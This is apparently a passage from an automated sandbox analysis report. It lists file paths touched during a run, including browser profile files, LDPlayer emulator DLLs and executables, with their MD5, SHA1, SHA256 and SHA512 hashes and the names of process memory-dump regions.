memory/6184-1315-0x0000019EDEAD0000-0x0000019EDEAD1000-memory.dmp
memory/6184-1314-0x0000019EDEAD0000-0x0000019EDEAD1000-memory.dmp
memory/6184-1313-0x0000019EDEAD0000-0x0000019EDEAD1000-memory.dmp
memory/6184-1312-0x0000019EDEAD0000-0x0000019EDEAD1000-memory.dmp
memory/6184-1307-0x0000019EDEAD0000-0x0000019EDEAD1000-memory.dmp
memory/6184-1306-0x0000019EDEAD0000-0x0000019EDEAD1000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 719f7ec803e33d96bd85e22c0b1d9ca2 |
| SHA1 | 159309cf67f81d660dab10087e2b4b09103befb8 |
| SHA256 | e29149a5e2fa7aceb27b4ee96707118a2da8f29e6989c74dbd90b3ced9628b8d |
| SHA512 | cf2b3f9ef42836c6a53205f63f7150d034c128e951962d6f56bd336732718152c00f688b6dbb07fa13cd6e802e178ed074d95188d99590be34558b7abdfce9c9 |
memory/5420-1331-0x0000000000730000-0x0000000001E79000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 5a2ccf8cb25bafbcfe1e7e636c6036ee |
| SHA1 | 973d1507f28bf69858b75efbab585c2531af1d89 |
| SHA256 | 0f56221319481bc146cbbe4357833d651ff42571a0305c7d08c5828e435ace0d |
| SHA512 | 4e4d5b92be845dfd2a1d0d0cdcb916688c14421760f5bf50deafbc3c5740a42a3610998f5709d97fa874b8345b56945773bea232c2cc598e1efa54bacae93054 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 4775375dc21dc0e556ba770b0bf8ce64 |
| SHA1 | 7720c0a34492020778d5d0994549358e371b5662 |
| SHA256 | 2de7399328c308d45eafbc73049e3d02366023c1aa2f81b695931d00306d1fb4 |
| SHA512 | 97fe2cd3eb41e386dadc70953aab8bd7c48ecf3f83cebe70c0d5cffb412ff503c7de344c46d2c581eb933e682c90508dd5bcb1e3eaac50b55c9d76eba6604d47 |
memory/5420-1356-0x0000000000730000-0x0000000001E79000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007
| MD5 | 87c2b09a983584b04a63f3ff44064d64 |
| SHA1 | 8796d5ef1ad1196309ef582cecef3ab95db27043 |
| SHA256 | d4a4a801c412a8324a19f21511a7880815b373628e66016bc1785a5a85e0afb0 |
| SHA512 | df1f0d6f5f53306887b0b16364651bda9cdc28b8ea74b2d46b2530c6772a724422b33bbdcd7c33d724d2fd4a973e1e9dbc4b654c9c53981386c341620c337067 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006
| MD5 | 2280e0e4c8efa0f5fc1c10980425f5cf |
| SHA1 | 1d78ccb26fef7f1bf5bf29de100811e1ac8bda23 |
| SHA256 | b9225cb1f0df94ebe87b9eb2ad8c63cf664d2dfdb47aeaff785de6c7ce01aa74 |
| SHA512 | b759fcbf578947c0290ab703652df9f37abb1f9f5cf6140acaa8c4d4ee655ee0ee1f9bee9d4fd210d9e12585a51358b52e0e9c0878abf2713e6fd69a496ac624 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000ae
| MD5 | 4bdb35f3f515f0cf3044e6a9684843b1 |
| SHA1 | 12c960465daf100b06c58c271420a6be3dc508ae |
| SHA256 | b835bd77e17447a2dacfce2645a5e812733fe5a777a5e45d9daa56d28675cbef |
| SHA512 | 9fa600b87843759b632c2d384596109cf1fb149a5ab38524cf43cab5833cb25c355479aee90d60462764200108cde5ec71f0988504c97ad09e25975cac65bfe5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000af
| MD5 | b9295fe93f7bb58d97cc858e302878a9 |
| SHA1 | 34c6b1246cad4841aa1522cbd41146f9a547e8c5 |
| SHA256 | c0233c9b273aae7df532a992e710aaec409455b4b413b89a25854e9fb215c36c |
| SHA512 | 4c44ddbd35807653a60e2718dbd2ea85f09d7107b270045bcc2484e2a0ba977fbbb5739236ce7edb71d584c8f68df31fa3bdd03229eeace60c19662469adafc5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 51fc7ef8245807972dadb2bfa909ddbd |
| SHA1 | 1f9f2b6c1b1e37a6ba1be54524100fe9d8d3a3dc |
| SHA256 | ddfd3f8c9d585f647c404d8be8fdec981c6ccc727f9c07b8350f6fbe71093329 |
| SHA512 | 534b570e98bfa94b9f76674a40ced16a5aca9558b2faa3657f9f350652225ada8073e3e01898e0f6b4dd3d879bbdff1fed5183d723c168f25d382ab715202a6c |
memory/5420-1482-0x0000000000730000-0x0000000001E79000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 90b0b26a4a4ece2e26521acb8e1d6225 |
| SHA1 | aeaae7b9f4e9c7ede60dfef22215dd4d098c160e |
| SHA256 | 452cecd0d9bab3b79ecf70858eebe30915e3594a4b971231170538f0dd047708 |
| SHA512 | fa479a92f644c348a6129c7ca266f3cc22c6180dcf51246f18293bc177e88ddb79417ddf0827e2b27baf6049848f04a3f5f265e103550a40e1dea2ae2df0f7df |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 367567379df130ffaaffb6c08ff7ff7e |
| SHA1 | 450f39fc14197afa7aa2464f7ce4c33565882f11 |
| SHA256 | c365aca6b484c35a0458f4eac70b9335231e16695e378de59190f72c66735501 |
| SHA512 | eb26cc7f49a50cc437d5ae4788f6d21485c07c546a863d82ded4422cc04fe5b9d94f4602ab3df975589e10b2580a618a435b3b1b7d7621c9d32d8fc6d5f14c49 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | b6f48def1ad0dc727f479ce8ffec8a6b |
| SHA1 | 488a3d7c23f20d7c90d9cd3010d31836d67b4028 |
| SHA256 | 88b9c140ca5cdbc682401e0cd009ef606ef17510c596d69c12b629f720543aec |
| SHA512 | ff657c31fa12c36894ac6002bbc33c3263739b9727aa255687ff9299087d47b2a6b390cd0bb6ce588b992c245e497f5e9178de97bec3c72a2d696160dd9f3a9a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5908ff.TMP
| MD5 | ac53c3d701ac9d2262645a3b1e905fc7 |
| SHA1 | 35a79d9bf820418b1a0a7f4892b4109e3eeda115 |
| SHA256 | b6065e2dd62a88a0920a471331b2024e26030cd42f13682941a5912bc9d9492d |
| SHA512 | 1e1e48bc1d9be3eb05d63c38a46a5b9fd864bd7f86ede84c26449a1a54a4a42b45ef101e31e457b9a4178fca624532ca4f20610017b780d7a98bb8f373ddf22a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5fc396b91108dc4cfe4953766be6c2bf |
| SHA1 | 477298a9d75ae514b4e48a9d4ebe35a8c42a4b94 |
| SHA256 | 69f3949ff14fc5768cf42551a5bfce489311ab94caec81d46f661bee9000b8ee |
| SHA512 | d7e24db3323672e5432989b2f2d0dbe3fcfdce72031ae55ab4ac738041af44beccc0e3ea3b9042a6922f630a2da518e2ac23e76f1010b92491cb8785c9d047ee |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 2cbddb344d9bcd12f7e2876515e59a49 |
| SHA1 | 71a4d42d7b015c3d659033a42d46da2accfda01f |
| SHA256 | 62b3ce8dc6eb0f92e71361fe01b555a6d558f1af604258a3763c2a8ae41b3718 |
| SHA512 | aca3c9ed90c9d76fbcea478a177738684eb7f62efc1e2da337527048a77e5ea5aeb0ea6bf35fbcdbbce71ab2ce68593a4220ab6aaadb95a88e64ea5897d38310 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | fb72bd2ab080b2379fb024ec91a798e7 |
| SHA1 | 4158424ec7c4383dfa9f8963347315c30832472d |
| SHA256 | 08d0f4c106205144a920be4eafc79cb2adc30e331b91ec250d96db95f529b40f |
| SHA512 | b93ed36940aa3f16719009f529ccf75238f7ed6da3e2eea4db3d2d0beeb32fa859f7faf114105e6fe6ce19f183cf471721954b3bab36d8a29bf8c2470b00da68 |
C:\Windows\Logs\DISM\dism.log
| MD5 | e7f634067f1b75b2cdfd1c0a0af14f16 |
| SHA1 | 9a288835e111af8889379e4abe0a6053f9258c01 |
| SHA256 | 8c5add1b9a9020f6e5148458db304902c7611d0fd128d4c2e4fdd8f8d60346a2 |
| SHA512 | 6545210c954c6c7eb6da535b7c1ce88d04dafceedd003f79921319ddaddb4b3fcde4334bc23c5384eff311f0d13d365367f69a6a2ae04bbfe27ebd99c224fca1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 5fc41320cf9f32202d81616f206470e2 |
| SHA1 | 77c2d04ca024a2d96be1a4c0b06f64cadb5a23c4 |
| SHA256 | 817a478b9d3914d10ce9df09e801c9b3373093d0ea84ad6a172d65f13c383f7b |
| SHA512 | 70cf95fa38eb889be219613f3a5aef1502a417be840ceb31b0104697a8cb6d5e2a35ccf29a363f6d9ac889cded272e8e5711590d351e7e61425d7403c6c6235c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 901c40e584fd5fba344796f86a839acb |
| SHA1 | 8e8e2a3f99e8c062ebb081b50f9ba46a192ee165 |
| SHA256 | beaaa476783d69bca746bcd9a82f7ff0360eb8dd131fc9bc09008d87111b4adf |
| SHA512 | 19623014eebf6978b9d9b897f4d2c37fc2a96d03f63957fbe88abc76bff9d601cf3ee0d33a2e16156a84e526ec268f3bafc787e89f0c4ac2533adc3c408b55f6 |
memory/700-2418-0x0000000004AC0000-0x0000000004AF6000-memory.dmp
memory/700-2419-0x0000000005130000-0x0000000005758000-memory.dmp
memory/700-2420-0x00000000050B0000-0x00000000050D2000-memory.dmp
memory/700-2422-0x0000000005A70000-0x0000000005AD6000-memory.dmp
memory/700-2421-0x0000000005990000-0x00000000059F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o0patsd3.5rv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/700-2432-0x0000000005AE0000-0x0000000005E34000-memory.dmp
memory/700-2433-0x0000000006030000-0x000000000604E000-memory.dmp
memory/700-2434-0x0000000006080000-0x00000000060CC000-memory.dmp
memory/700-2446-0x0000000006620000-0x000000000663E000-memory.dmp
memory/700-2436-0x000000006D760000-0x000000006D7AC000-memory.dmp
memory/700-2435-0x0000000007200000-0x0000000007232000-memory.dmp
memory/700-2447-0x0000000007240000-0x00000000072E3000-memory.dmp
memory/700-2449-0x0000000007380000-0x000000000739A000-memory.dmp
memory/700-2448-0x00000000079C0000-0x000000000803A000-memory.dmp
memory/700-2450-0x00000000073F0000-0x00000000073FA000-memory.dmp
memory/700-2451-0x0000000007600000-0x0000000007696000-memory.dmp
memory/700-2452-0x0000000007580000-0x0000000007591000-memory.dmp
memory/700-2453-0x00000000075C0000-0x00000000075CE000-memory.dmp
memory/700-2454-0x00000000076A0000-0x00000000076BA000-memory.dmp
memory/2800-2465-0x0000000005A00000-0x0000000005D54000-memory.dmp
memory/2800-2470-0x000000006D760000-0x000000006D7AC000-memory.dmp
memory/5768-2490-0x00000000060D0000-0x0000000006424000-memory.dmp
memory/5768-2495-0x000000006D760000-0x000000006D7AC000-memory.dmp
F:\LDPlayer\LDPlayer9\ldmutiplayer\msvcr110.dll
| MD5 | 4ba25d2cbe1587a841dcfb8c8c4a6ea6 |
| SHA1 | 52693d4b5e0b55a929099b680348c3932f2c3c62 |
| SHA256 | b30160e759115e24425b9bcdf606ef6ebce4657487525ede7f1ac40b90ff7e49 |
| SHA512 | 82e86ec67a5c6cddf2230872f66560f4b0c3e4c1bb672507bbb8446a8d6f62512cbd0475fe23b619db3a67bb870f4f742761cf1f87d50db7f14076f54006f6c6 |
F:\LDPlayer\ldmutiplayer\fonts\Roboto-Regular.otf
| MD5 | 4acd5f0e312730f1d8b8805f3699c184 |
| SHA1 | 67c957e102bf2b2a86c5708257bc32f91c006739 |
| SHA256 | 72336333d602f1c3506e642e0d0393926c0ec91225bf2e4d216fcebd82bb6cb5 |
| SHA512 | 9982c1c53cee1b44fd0c3df6806b8cbf6b441d3ed97aeb466dba568adce1144373ce7833d8f44ac3fa58d01d8cdb7e8621b4bb125c4d02092c355444651a4837 |
F:\LDPlayer\ldmutiplayer\fonts\NotoSans-Regular.otf
| MD5 | 93b877811441a5ae311762a7cb6fb1e1 |
| SHA1 | 339e033fd4fbb131c2d9b964354c68cd2cf18bd1 |
| SHA256 | b3899a2bb84ce5e0d61cc55c49df2d29ba90d301b71a84e8c648416ec96efc8b |
| SHA512 | 7f053cec61fbddae0184d858c3ef3e8bf298b4417d25b84ac1fc888c052eca252b24f7abfff7783442a1b80cc9fc2ce777dda323991cc4dc79039f4c17e21df4 |
F:\LDPlayer\LDPlayer9\ldmutiplayer\ssleay32.dll
| MD5 | 0054560df6c69d2067689433172088ef |
| SHA1 | a30042b77ebd7c704be0e986349030bcdb82857d |
| SHA256 | 72553b45a5a7d2b4be026d59ceb3efb389c686636c6da926ffb0ca653494e750 |
| SHA512 | 418190401b83de32a8ce752f399b00c091afad5e3b21357a53c134cce3b4199e660572ee71e18b5c2f364d3b2509b5365d7b569d6d9da5c79ae78c572c1d0ba0 |
F:\LDPlayer\LDPlayer9\ldmutiplayer\msvcr120.dll
| MD5 | 50097ec217ce0ebb9b4caa09cd2cd73a |
| SHA1 | 8cd3018c4170072464fbcd7cba563df1fc2b884c |
| SHA256 | 2a2ff2c61977079205c503e0bcfb96bf7aa4d5c9a0d1b1b62d3a49a9aa988112 |
| SHA512 | ac2d02e9bfc2be4c3cb1c2fff41a2dafcb7ce1123998bbf3eb5b4dc6410c308f506451de9564f7f28eb684d8119fb6afe459ab87237df7956f4256892bbab058 |
F:\LDPlayer\LDPlayer9\ldmutiplayer\msvcp120.dll
| MD5 | 50260b0f19aaa7e37c4082fecef8ff41 |
| SHA1 | ce672489b29baa7119881497ed5044b21ad8fe30 |
| SHA256 | 891603d569fc6f1afed7c7d935b0a3c7363c35a0eb4a76c9e57ef083955bc2c9 |
| SHA512 | 6f99d39bfe9d4126417ff65571c78c279d75fc9547ee767a594620c0c6f45f4bb42fd0c5173d9bc91a68a0636205a637d5d1c7847bd5f8ce57e120d210b0c57d |
F:\LDPlayer\LDPlayer9\ldmutiplayer\msvcp110.dll
| MD5 | 3e29914113ec4b968ba5eb1f6d194a0a |
| SHA1 | 557b67e372e85eb39989cb53cffd3ef1adabb9fe |
| SHA256 | c8d5572ca8d7624871188f0acabc3ae60d4c5a4f6782d952b9038de3bc28b39a |
| SHA512 | 75078c9eaa5a7ae39408e5db1ce7dbce5a3180d1c644bcb5e481b0810b07cb7d001d68d1b4f462cd5355e98951716f041ef570fcc866d289a68ea19b3f500c43 |
F:\LDPlayer\LDPlayer9\ldmutiplayer\libssl-1_1.dll
| MD5 | e8fd6da54f056363b284608c3f6a832e |
| SHA1 | 32e88b82fd398568517ab03b33e9765b59c4946d |
| SHA256 | b681fd3c3b3f2d59f6a14be31e761d5929e104be06aa77c883ada9675ca6e9fd |
| SHA512 | 4f997deebf308de29a044e4ff2e8540235a41ea319268aa202e41a2be738b8d50f990ecc68f4a737a374f6d5f39ce8855edf0e2bb30ce274f75388e3ddd8c10b |
F:\LDPlayer\LDPlayer9\ldmutiplayer\libssh2.dll
| MD5 | 52c43baddd43be63fbfb398722f3b01d |
| SHA1 | be1b1064fdda4dde4b72ef523b8e02c050ccd820 |
| SHA256 | 8c91023203f3d360c0629ffd20c950061566fb6c780c83eaa52fb26abb6be86f |
| SHA512 | 04cc3d8e31bd7444068468dd32ffcc9092881ca4aaea7c92292e5f1b541f877bdec964774562cb7a531c3386220d88b005660a2b5a82957e28350a381bea1b28 |
F:\LDPlayer\LDPlayer9\ldmutiplayer\libeay32.dll
| MD5 | ba46e6e1c5861617b4d97de00149b905 |
| SHA1 | 4affc8aab49c7dc3ceeca81391c4f737d7672b32 |
| SHA256 | 2eac0a690be435dd72b7a269ee761340099bf444edb4f447fa0030023cbf8e1e |
| SHA512 | bf892b86477d63287f42385c0a944eee6354c7ae557b039516bf8932c7140ca8811b7ae7ac111805773495cf6854586e8a0e75e14dbb24eba56e4683029767b6 |
F:\LDPlayer\LDPlayer9\ldmutiplayer\libcurl.dll
| MD5 | 2d40f6c6a4f88c8c2685ee25b53ec00d |
| SHA1 | faf96bac1e7665aa07029d8f94e1ac84014a863b |
| SHA256 | 1d7037da4222de3d7ca0af6a54b2942d58589c264333ef814cb131d703b5c334 |
| SHA512 | 4e6d0dc0dc3fb7e57c6d7843074ee7c89c777e9005893e089939eb765d9b6fb12f0e774dc1814f6a34e75d1775e19e62782465731fd5605182e7984d798ba779 |
F:\LDPlayer\LDPlayer9\ldmutiplayer\libcrypto-1_1.dll
| MD5 | 01c4246df55a5fff93d086bb56110d2b |
| SHA1 | e2939375c4dd7b478913328b88eaa3c91913cfdc |
| SHA256 | c9501469ad2a2745509ab2d0db8b846f2bfb4ec019b98589d311a4bd7ac89889 |
| SHA512 | 39524d5b8fc7c9d0602bc6733776237522dcca5f51cc6ceebd5a5d2c4cbda904042cee2f611a9c9477cc7e08e8eadd8915bf41c7c78e097b5e50786143e98196 |
F:\LDPlayer\LDPlayer9\ldmutiplayer\dnresource.rcc
| MD5 | d4d2fd2ce9c5017b32fc054857227592 |
| SHA1 | 7ee3b1127c892118cc98fb67b1d8a01748ca52d5 |
| SHA256 | c4b7144dd50f68ca531568cafb6bb37bf54c5b078fbac6847afa9c3b34b5f185 |
| SHA512 | d2f983dde93099f617dd63b37b8a1039166aaf852819df052a9d82a8407eb299dac22b4ffe8cab48331e695bf01b545eb728bec5d793aeb0045b70ea9ceab918 |
F:\LDPlayer\LDPlayer9\ldmutiplayer\cximagecrt.dll
| MD5 | 66df6f7b7a98ff750aade522c22d239a |
| SHA1 | f69464fe18ed03de597bb46482ae899f43c94617 |
| SHA256 | 91e3035a01437b54adda33d424060c57320504e7e6a0c85db2654815ba29c71f |
| SHA512 | 48d4513e09edd7f270614258b2750d5e98f0dbce671ba41a524994e96ed3df657fce67545153ca32d2bf7efcb35371cae12c4264df9053e4eb5e6b28014ed20e |
F:\LDPlayer\LDPlayer9\ldmutiplayer\7za.exe
| MD5 | ad9d7cbdb4b19fb65960d69126e3ff68 |
| SHA1 | dcdc0e609a4e9d5ff9d96918c30cb79c6602cb3d |
| SHA256 | a6c324f2925b3b3dbd2ad989e8d09c33ecc150496321ae5a1722ab097708f326 |
| SHA512 | f0196bee7ad8005a36eea86e31429d2c78e96d57b53ff4a64b3e529a54670fa042322a3c3a21557c96b0b3134bf81f238a9e35124b2d0ce80c61ed548a9791e7 |
F:\LDPlayer\LDPlayer9\dnmultiplayer.exe
| MD5 | 330013a714c5dc0c561301adcccd8bc8 |
| SHA1 | 030b1d6ac68e64dec5cbb82a75938c6ce5588466 |
| SHA256 | c22a57cd1b0bdba47652f5457c53a975b2e27daa3955f5ef4e3eaee9cf8d127a |
| SHA512 | 6afb7e55a09c9aac370dff52755b117ad16b4fc6973665fce266ea3a7934edfb65f821f4f27f01f4059adb0cf54cc3a97d5ff4038dc005f51ecee626fd5fadd1 |
F:\LDPlayer\LDPlayer9\dnplayer.exe
| MD5 | 2061141f3c490b5b441eff06e816a6c2 |
| SHA1 | d24166db06398c6e897ff662730d3d83391fdaaa |
| SHA256 | 2f1e555c3cb142b77bd72209637f9d5c068d960cad52100506ace6431d5e4bb0 |
| SHA512 | 6b6e791d615a644af9e3d8b31a750c4679e18ef094fea8cd1434473af895b67f8c45a7658bfedfa30cc54377b02f7ee8715e11ee376ed7b95ded9d82ddbd3ccc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 56067634f68231081c4bd5bdbfcc202f |
| SHA1 | 5582776da6ffc75bb0973840fc3d15598bc09eb1 |
| SHA256 | 8c08b0cbceb301c8f960aa674c6e7f6dbf40b4a1c2684e6fb0456ec5ff0e56b4 |
| SHA512 | c4657393e0b9ec682570d7e251644a858d33e056ccd0f3eebffd0fde25244b3a699b8d9244bcdac00d6f74b49833629b270e099c2b557f729a9066922583f784 |
C:\Users\Admin\AppData\Roaming\XuanZhi9\ldopengl32x.dll
| MD5 | b001f88504c8c9973e9a3b4dc03e6d1a |
| SHA1 | a54b3046a70a4f2c792ad6a382b637b599f1dc48 |
| SHA256 | 8ee4cbed114a588e934b5043f95c9c06f40468c2300fa0d1d938d16c1d46a8fd |
| SHA512 | 390e53be657fc35fb2e9f41b76b3b07c161a860d72445a4b1425ca973a6d8c0f32f6de6844719c6e9813e8d949ab65263642dea01c800a00285bd45595bed4d8 |
F:\LDPlayer\LDPlayer9\vms\leidian0\sdcard.vmdk
| MD5 | 4d592fd525e977bf3d832cdb1482faa0 |
| SHA1 | 131c31bcff32d11b6eda41c9f1e2e26cc5fbc0ef |
| SHA256 | f90ace0994c8cae3a6a95e8c68ca460e68f1662a78a77a2b38eba13cc8e487b6 |
| SHA512 | afa31b31e1d137a559190528998085c52602d79a618d930e8c425001fdfbd2437f732beda3d53f2d0e1fc770187184c3fb407828ac39f00967bf4ae015c6ba77 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 81e892ca5c5683efdf9135fe0f2adb15 |
| SHA1 | 39159b30226d98a465ece1da28dc87088b20ecad |
| SHA256 | 830f394548cff6eed3608476190a7ee7d65fe651adc638c5b27ce58639a91e17 |
| SHA512 | c943f4cfe8615ac159cfac13c10b67e6c0c9093851dd3ac6dda3b82e195d3554e3c37962010a2d0ae5074828d376402624f0dda5499c9997e962e4cfd26444c0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 601767ec26e9e35e03cbf73473cfaf1d |
| SHA1 | 309d0d37d3929d2200c696afb3e4d7172c57a28e |
| SHA256 | dd503d58f64bc01e3103fa9dec56afae997076ba8650268372caff7660d1e784 |
| SHA512 | b422be7f4a7d898ac7171e2feb99ba1e9c3920186690d2c47681c9a74696bb5b5764b68d2b0637e6e254fc3a09d166d5984df702d4222de3c8dbe5ed9a8ca0c0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6a8bb9074cd3a2397f65c2ea2f2fb915 |
| SHA1 | 6ecd13204b139724d18414ffc263e329af249237 |
| SHA256 | c5c8093b26833a89c8ce9384150b7b735f5d295bd1d54db4faa8a6cab0de1497 |
| SHA512 | 16a78b05e8b59a0ec44bf5269d60093aa73d3ea076d5455f3349d6ec679adba875e1c73bf17358fc71da5021ee735efec3fa3859855058c1ac5e28e653b56c22 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c9d661daaa73f6495f512720b756f0f6 |
| SHA1 | 6f17bc86cc765a2b0dcff3a45b00735b4ece7f33 |
| SHA256 | 53188099a26693943b5f4fb70927538238ad27c23474e498f16d951a446efe61 |
| SHA512 | c517ff0dfff4cbea34f389b8462cf019915db6bf9c8518d32fb471c5cfc129f7e30bd5b7fc766f1cf4f1333e84b50111fc7fa711057f746765d985cf5e5bb42d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 3ee1711b94841de0dbac529fda44439f |
| SHA1 | d33bab647997c392363f659cbe09fc4519710778 |
| SHA256 | 16020c72e58a90ecc0320f2769c87796acdc514eab971d69317148b0d30e6f64 |
| SHA512 | 41bb114af40dc2af027f452c0cd32cad566cc5c2ec5f6dd17fc437e8a9437b8203d685351d6250543bd9665ecab23c667d52b20f794f3dc8b9e0b27d3a0621a7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | f65740405f5fa8987c1894b36e8417a8 |
| SHA1 | a3c8785a4b7e8b590bcc2bedba49fe504c008e15 |
| SHA256 | 54de7d0fb70f1752099b35dd8d57b94487148b8496ad51bc97d4d910fa332ace |
| SHA512 | b96e6728ca60b6e9dced89233292fd6a8c0a3bc02e2516d2596f469892e9b4dd9c32e537b9404ff8c5eceb270fd5bb707cf0bd681cf1af0274ef9fff81db8e7e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | ba95031fb0c5e740a9618616327c6564 |
| SHA1 | 324e952af62f516622cb647004cc1b691510f7f3 |
| SHA256 | a593413c58ec82f077a1947adebc047fc138d656fbf16cc47b368b2c6cea0783 |
| SHA512 | a224fcbc970a5fc690075a59a63557b50c316425436bf6c2057c6c2a553e57ff65747a35a79b18a0da544d82ff7528bc11ca3473264dbcd73d0334cfe8c4339d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9c6343663711d75f08803b7831e2c1d1 |
| SHA1 | d53f006e42a793e4d6dbc0fbcad7e9ef99caf476 |
| SHA256 | d1bb29fd2b19e56575728c1adfd8fa04052319b63ca9c251c2a5ec28083f8dfb |
| SHA512 | d34f7d7944b8a4424abc7ab247c23ce75422a2de10e28c6797e191df6e7d663ee6c588df52f5d1462c317b721ae68ac2396acb800af1645358e359ad4ec73942 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ae243e18b51c8c6621da6c4531effb4e |
| SHA1 | 228b09f7d5b3239b2b683c9e5b92f8443a9aba3d |
| SHA256 | a64b62cf8db63b28b22bdcdb034633c47c5ae9193fdbd2598e21970ae43759d7 |
| SHA512 | 271fe1ac1967afdb6fbc798cad678d9222831188f80e607ab503510e9ae3254b65d9586358bfa1b3ec83dbd11e551ee9c8398e1d2c24f24bbbbf97f51ab45487 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | a5a1149047729a493b1a2a65063c39ba |
| SHA1 | 8f1f45cb0c0772dcd05795734cbf408636fb9fb9 |
| SHA256 | e0ef1f906ea2606c802310437fe799d93e073770ab6549060ee4b9c9c49f2006 |
| SHA512 | 8ce257a087115e2d542657a2b4679d0c100ebdec76e3392cff1bbba133e129f2fcdbd73f9baab92e762bef47a2572d3dc8553fa3858d787d2a0b2bf8f05dc54e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 24fd66b24d54de942878a2a19a6fee10 |
| SHA1 | 3af8305572649cae6b782db0246eed3cb3cd63cb |
| SHA256 | a2fd9b67b1dab70cb3a92b443691a8dba06fa7e6f458a09a06c1823df1dd37cf |
| SHA512 | 5e2f3f25fdc1c3a4f3ae3cba29024d2883c4331cfef8327ffdc225ad54ba7befdb5ae922329f8368d2fd636a540af6494e1b55c51cfa0924debd216603486ac3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5b45ef.TMP
| MD5 | 59f9815eba1235c05418ab479d891e2e |
| SHA1 | 2fae56025d23b09dd44de6100b64dbfaf26b732b |
| SHA256 | f26412b7cf21f46fbbf1a1acb5f6e9c37f7bc6d7f586ce933b7b9aea6d853734 |
| SHA512 | 7c0f26c7b1c48b16e6ae48d42b0f6aabe1663387a23e4f698a099b81745dfd63a46b64eda90cb02b1a90a494768b01e12186e470062d1ee906b2646d784b257e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | b710cf65a63d32a578a250b0d6fa0f1f |
| SHA1 | 358560b23e801678f45110baa0cd6ce05fd32e54 |
| SHA256 | 50aa71f72017dc42c2a43fff7e1793cba98ef6005f6e8223e16715a28727f8fd |
| SHA512 | dc2b77a0fd363dacaa83c71868e201157e69271987f417a25c3334548f423cf34b4b380b2d32d4dc41bdd587799370d637cdd426dc427e9c062e18b7482a7f61 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 42f399964d76d3c43f9d5653974bb1a5 |
| SHA1 | 4f5f83264ca15eb298d40061a464ef3f00712fd3 |
| SHA256 | 4680690df3421797810932890e33cd5565b246c37d28cfb7d3ddc5fc490f8673 |
| SHA512 | a7d461a0a24b017c6be039835fdfea8c2b28a47b063dc3f32acb072a225a4c453fdd383681b062dc2562e4fddf31e4c496d71c096bc2d9fab77f7f4b4ac059b9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 13453a19277acb21aa42ba8e469da629 |
